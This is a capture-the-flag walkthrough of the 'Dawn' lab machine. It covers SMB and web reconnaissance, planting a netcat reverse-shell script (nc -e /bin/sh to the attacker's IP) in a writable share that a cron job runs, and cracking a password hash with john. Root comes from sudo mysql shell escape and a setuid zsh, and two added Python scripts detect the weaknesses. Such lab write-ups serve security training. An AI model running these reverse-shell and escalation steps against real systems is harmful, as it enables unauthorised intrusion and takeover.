1. Network scanning
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.14 00:0c:29:5b:40:96 VMware, Inc.
192.168.10.254 00:50:56:fb:45:fa VMware, Inc.
2. Port scanning the target
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.14
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-07 06:15 EST
Nmap scan report for 192.168.10.14
Host is up (0.00068s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
MAC Address: 00:0C:29:5B:40:96 (VMware)
=========================
┌──(root㉿kali)-[~]
└─# nmap -p80,139,445,3306 -sC -sV 192.168.10.14
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-07 06:17 EST
Nmap scan report for 192.168.10.14
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 13
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, FoundRows, SupportsTransactions, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, ConnectWithDatabase, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: >MJjWW.}MHa2p`q6V/){
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:5B:40:96 (VMware)
Service Info: Host: DAWN
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-02-07T11:18:08
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: dawn
| NetBIOS computer name: DAWN\x00
| Domain name: dawn
| FQDN: dawn.dawn
|_ System time: 2023-02-07T06:18:08-05:00
SAMBA
┌──(root㉿kali)-[~]
└─# smbclient -L \\\\192.168.10.14
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE.
IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP DAWN
┌──(root㉿kali)-[~]
└─# smbclient \\\\192.168.10.14\\ITDEPT
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \>
┌──(root㉿kali)-[~]
└─# echo 123 > 123.txt
┌──(root㉿kali)-[~]
└─#
┌──(root㉿kali)-[~]
└─# smbclient \\\\192.168.10.14\\ITDEPT
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put 123.txt
putting file 123.txt as \123.txt (1.0 kb/s) (average 1.0 kb/s)
smb: \> ls
. D 0 Tue Feb 7 06:32:34 2023
.. D 0 Fri Aug 2 23:21:39 2019
123.txt A 4 Tue Feb 7 06:32:35 2023
7158264 blocks of size 1024. 3499884 blocks available
smb: \>
Web information gathering
┌──(root㉿kali)-[~]
└─# dirb http://192.168.10.14
START_TIME: Tue Feb 7 06:36:52 2023
URL_BASE: http://192.168.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.14/ ----
+ http://192.168.10.14/index.html (CODE:200|SIZE:791)
==> DIRECTORY: http://192.168.10.14/logs/
+ http://192.168.10.14/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.10.14/logs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.14
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.10.14/_23-02-07_06-37-36.txt
Error Log: /root/.dirsearch/logs/errors-23-02-07_06-37-36.log
Target: http://192.168.10.14/
[06:37:36] Starting:
[06:37:36] 403 - 299B - /.ht_wsr.txt
[06:37:36] 403 - 302B - /.htaccess.bak1
[06:37:36] 403 - 302B - /.htaccess.orig
[06:37:36] 403 - 302B - /.htaccess.save
[06:37:36] 403 - 304B - /.htaccess.sample
[06:37:36] 403 - 300B - /.htaccess_sc
[06:37:36] 403 - 303B - /.htaccess_extra
[06:37:36] 403 - 300B - /.htaccessBAK
[06:37:36] 403 - 301B - /.htaccessOLD2
[06:37:36] 403 - 302B - /.htaccess_orig
[06:37:36] 403 - 293B - /.html
[06:37:36] 403 - 292B - /.htm
[06:37:36] 403 - 300B - /.htaccessOLD
[06:37:36] 403 - 302B - /.htpasswd_test
[06:37:36] 403 - 299B - /.httr-oauth
[06:37:36] 403 - 298B - /.htpasswds
[06:37:37] 403 - 292B - /.php
[06:37:48] 200 - 791B - /index.html
[06:37:49] 301 - 313B - /logs -> http://192.168.10.14/logs/
[06:37:49] 200 - 2KB - /logs/
[06:37:49] 403 - 302B - /logs/error.log
[06:37:54] 403 - 302B - /server-status/
[06:37:54] 403 - 301B - /server-status
Task Completed
Visiting http://192.168.10.14/logs/ in a browser, only management.log can be downloaded.
Reading this log file shows:
the root user is running the pspy64 program and writing its output to /var/www/html/logs/management.log.
┌──(root㉿kali)-[/tmp/mozilla_root0]
└─# grep '/home/dawn/ITDEPT' management.log | grep product-control
2023/02/07 06:13:01 CMD: UID=0 PID=793 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:13:01 CMD: UID=1000 PID=798 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:14:01 CMD: UID=0 PID=809 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:14:01 CMD: UID=1000 PID=813 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:15:01 CMD: UID=0 PID=825 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:16:01 CMD: UID=0 PID=840 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:16:01 CMD: UID=1000 PID=843 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:17:01 CMD: UID=1000 PID=858 | /bin/sh -c /home/dawn/ITDEPT/product-control
┌──(root㉿kali)-[/tmp/mozilla_root0]
└─# grep '/home/dawn/ITDEPT' management.log | grep web-control
2023/02/07 06:13:01 CMD: UID=0 PID=795 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:13:01 CMD: UID=33 PID=799 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:14:01 CMD: UID=33 PID=814 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:15:01 CMD: UID=0 PID=824 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:15:01 CMD: UID=33 PID=829 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:16:01 CMD: UID=0 PID=839 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:16:01 CMD: UID=33 PID=844 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:17:01 CMD: UID=33 PID=860 | /bin/sh -c /home/dawn/ITDEPT/web-control
Combining the SMB and web reconnaissance
Reading management.log shows that the dawn user periodically executes /home/dawn/ITDEPT/product-control, and the \\10.0.0.118\ITDEPT share happens to be writable, so we can try writing a reverse shell back to our host into the web-control file and let the dawn user execute it.
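Added example in Python (not part of the original writeup): it parses pspy-style lines like those in management.log and reports every file that root makes world-writable with chmod and that some process then executes, which is exactly the pattern that makes product-control and web-control hijackable. The sample log is constructed from the excerpt above plus two constructed benign lines, and the line layout is assumed to be exactly as shown there.

```python
import re
from collections import defaultdict

# Constructed sample log: the first four lines are copied from the management.log
# excerpt above; the last two are a constructed 755 job that must NOT be flagged.
SAMPLE_LOG = """\
2023/02/07 06:13:01 CMD: UID=0 PID=793 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:13:01 CMD: UID=0 PID=795 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:13:01 CMD: UID=1000 PID=798 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:13:01 CMD: UID=33 PID=799 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:14:01 CMD: UID=0 PID=811 | /bin/sh -c chmod 755 /usr/local/bin/backup.sh
2023/02/07 06:14:01 CMD: UID=0 PID=812 | /bin/sh -c /usr/local/bin/backup.sh
"""

# pspy line layout: "YYYY/MM/DD HH:MM:SS CMD: UID=<n> PID=<n> | <command line>"
LINE_RE = re.compile(r"^\S+ \S+ CMD: UID=(?P<uid>\d+) PID=\d+ \| (?P<cmd>.*)$")
CHMOD_RE = re.compile(r"\bchmod\s+(?P<mode>[0-7]{3,4})\s+(?P<path>\S+)")
SH_PREFIX = "/bin/sh -c "

def parse_pspy(text):
    """Yield (uid, command) per well-formed line, unwrapping '/bin/sh -c ...'."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            cmd = m.group("cmd")
            yield int(m.group("uid")), cmd[len(SH_PREFIX):] if cmd.startswith(SH_PREFIX) else cmd

def world_writable(mode):
    """True when the octal mode's 'others' digit carries the write bit (o+w)."""
    return int(mode[-1], 8) & 0o2 != 0

def find_hijackable_tasks(log_text):
    """Map path -> (uid that ran chmod, sorted uids that later executed the file)
    for every file made world-writable and subsequently run by anyone."""
    made_ww = {}                 # path -> uid that loosened the permissions
    executed = defaultdict(set)  # path -> uids seen executing it afterwards
    for uid, cmd in parse_pspy(log_text):
        m = CHMOD_RE.search(cmd)
        if m and world_writable(m.group("mode")):
            made_ww[m.group("path")] = uid
            continue
        first = cmd.split(maxsplit=1)[0] if cmd.strip() else ""
        if first in made_ww:
            executed[first].add(uid)
    return {p: (u, sorted(executed[p])) for p, u in made_ww.items() if executed[p]}

if __name__ == "__main__":
    for path, (chmod_uid, runners) in find_hijackable_tasks(SAMPLE_LOG).items():
        print(f"{path}: made o+w by UID {chmod_uid}, then executed by UIDs {runners}")
```

On the real log the same check over the full file surfaces both ITDEPT scripts, and the fix on the defending side is to stop the root cron job from loosening their permissions rather than to hide the log.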
Initial foothold
Write the reverse shell into the product-control file and upload it to ITDEPT
┌──(root㉿kali)-[~/dawn]
└─# cat product-control
#!/bin/bash
nc -e /bin/sh 192.168.10.100 4444
Start a listener in another window
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
┌──(root㉿kali)-[~/dawn]
└─# smbclient \\\\192.168.10.14\\ITDEPT
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \>
smb: \> put product-control
putting file product-control as \product-control (11.2 kb/s) (average 11.2 kb/s)
smb: \>
smb: \>
smb: \> ls
. D 0 Wed Feb 8 02:05:49 2023
.. D 0 Fri Aug 2 23:21:39 2019
123.txt A 4 Tue Feb 7 06:32:35 2023
product-control A 46 Wed Feb 8 02:05:49 2023
7158264 blocks of size 1024. 3495964 blocks available
smb: \>
A few seconds later the target connects back to the listener on Kali port 4444
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.14] 34086
ls
ITDEPT
id
uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
Upgrade to an interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
dawn@dawn:~$
Privilege escalation
mysql
Checking the dawn user's command history reveals a password hash, $1$$bOKpT2ijO.XcGlpjgAup9/, and shows that the user has sudo privileges
dawn@dawn:~$ history
history
1 echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
2 ls
3 ls -la
4 nano .bash_history
5 echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
6 nano .bash_history
7 echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
8 sudo -l
9 su
10 sudo -l
11 sudo mysql -u root -p
12 ls -la
13 nano .bash_history
14 exit
Crack the hash to recover the plaintext password.
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
ls
product-control rockyou.txt
vim bash
$1$$bOKpT2ijO.XcGlpjgAup9/
ls
bash product-control rockyou.txt
┌──(root㉿kali)-[~/dawn]
└─# john --wordlist=rockyou.txt bash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
onii-chan29 (?) `cracked`
1g 0:00:00:22 DONE (2023-02-08 02:20) 0.04428g/s 214184p/s 214184c/s 214184C/s oninaflorent..onigzkix
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Check sudo privileges
dawn@dawn:/$ sudo -l
sudo -l
Matching Defaults entries for dawn on dawn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dawn may run the following commands on dawn:
(root) NOPASSWD: /usr/bin/mysql    # mysql runs as root without the root password
dawn@dawn:/$
Log in to the MySQL database
dawn@dawn:~$ sudo mysql -u root -p
sudo mysql -u root -p
Enter password: onii-chan29
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 13
Server version: 10.3.15-MariaDB-1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Run a system command directly from the MySQL client; privilege escalation succeeds
MariaDB [(none)]> \! /bin/bash
\! /bin/bash
root@dawn:/home/dawn#
root@dawn:/home/dawn# whoami
whoami
root
root@dawn:/home/dawn# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dawn:/home/dawn#
Method 2: SUID privilege escalation
dawn@dawn:~$ find / -type f -perm -u=s -ls 2>/dev/null
find / -type f -perm -u=s -ls 2>/dev/null
162007 36 -rwsr-xr-x 1 root root 35600 Jun 17 2018 /usr/sbin/mount.cifs
143462 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
266373 20 -rwsr-xr-x 1 root root 18888 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
268427 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
146814 428 -rwsr-xr-x 1 root root 436552 Apr 8 2019 /usr/lib/openssh/ssh-keysign
134749 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
134602 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
147964 24 -rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec
131136 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
163709 156 -rwsr-xr-x 1 root root 157192 Jan 12 2019 /usr/bin/sudo
135083 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
163813 844 -rwsr-xr-x 1 root root 861568 Feb 4 2019 /usr/bin/zsh
131134 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
131132 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
135085 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
131131 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
dawn@dawn:~$
Running zsh directly gives root privileges
dawn@dawn:~$ zsh
zsh
dawn# id
id
uid=1000(dawn) gid=1000(dawn) euid=0(root) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
dawn# cd /root
cd /root
dawn# ls
ls
flag.txt pspy64
dawn# cat flag.txt
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!
flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}
dawn#
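Added example in Python (not the writeup's own code) showing how a defender would catch the setuid zsh above before an attacker does: it parses the `find / -type f -perm -u=s -ls` listing and flags any setuid shell plus anything missing from a baseline of expected setuid files. The listing is an abridged copy of the one above; the BASELINE and SHELLS sets are assumptions constructed for this host.

```python
import os

# Constructed input: an abridged copy of the `find / -type f -perm -u=s -ls`
# listing shown above (fields: inode blocks perms links owner group size date path).
FIND_LS_OUTPUT = """\
162007 36 -rwsr-xr-x 1 root root 35600 Jun 17 2018 /usr/sbin/mount.cifs
143462 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
134749 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
163709 156 -rwsr-xr-x 1 root root 157192 Jan 12 2019 /usr/bin/sudo
163813 844 -rwsr-xr-x 1 root root 861568 Feb 4 2019 /usr/bin/zsh
131132 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
"""

# Assumed baseline: the setuid files a stock install of this image is expected to
# carry (constructed here by hand; in practice record it from a known-good host).
BASELINE = {"/usr/sbin/mount.cifs", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
            "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/passwd"}
# A setuid shell is always a finding, whether or not it appears in the baseline.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh", "fish"}

def parse_find_ls(text):
    """Return [(path, owner, group, perms)] from `find -ls` lines; the path is
    assumed to contain no whitespace, so it is taken as the last field."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 11 and f[2].startswith("-"):
            rows.append((f[-1], f[4], f[5], f[2]))
    return rows

def audit_suid(text, baseline=BASELINE):
    """Classify each setuid file as 'shell' (setuid interpreter), 'unexpected'
    (absent from the baseline) or 'ok'. Returns {path: verdict}."""
    verdicts = {}
    for path, owner, group, perms in parse_find_ls(text):
        if perms[3] != "s":          # owner-exec slot must show the setuid bit
            continue
        if os.path.basename(path) in SHELLS:
            verdicts[path] = "shell"
        elif path not in baseline:
            verdicts[path] = "unexpected"
        else:
            verdicts[path] = "ok"
    return verdicts

if __name__ == "__main__":
    for path, verdict in sorted(audit_suid(FIND_LS_OUTPUT).items(), key=lambda kv: kv[1]):
        print(f"{verdict:10} {path}")
```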